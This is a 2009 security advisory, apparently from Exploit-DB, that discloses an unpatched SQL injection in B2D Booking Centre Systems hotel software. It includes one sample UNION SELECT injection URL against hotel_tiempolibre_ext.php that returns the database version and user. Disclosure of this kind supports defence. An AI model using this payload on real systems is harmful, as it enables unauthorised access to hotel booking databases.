header-logo
Suggest Exploit
vendor:
Booking Centre Systems
by:
Salvatore Fresta aka Drosophila
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Booking Centre Systems
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

B2D Booking Centre Systems

All parameters of this application are not properly sanitised and are affected to SQL Injection.

Mitigation:

No patch.
Source

Exploit-DB raw data:

 Name              B2D Booking Centre Systems
 Vendor            http://www.bookingcentre.eu

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-12-11

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

Booking Centre Systems is a multilingual low cost and high
performance software solution for any Individual Hotel  or
Hotels Group or Portal Tourist.


II. DESCRIPTION

All  parameters  of  this  application  are  not  properly
sanitised and are affected to SQL Injection.


III. ANALYSIS

Summary:

 A) SQL Injection

A) SQL Injection

All parameters are not properly sanitised and in order to
exploit they, the Magic Quotes GPG may be On.


IV. SAMPLE CODE

http://site/hotel_tiempolibre_ext.php?HotelID=4&NoticiaID=-1 UNION ALL
SELECT 1,2,3,version(),5,user(),7,8,9%23


V. FIX

No patch.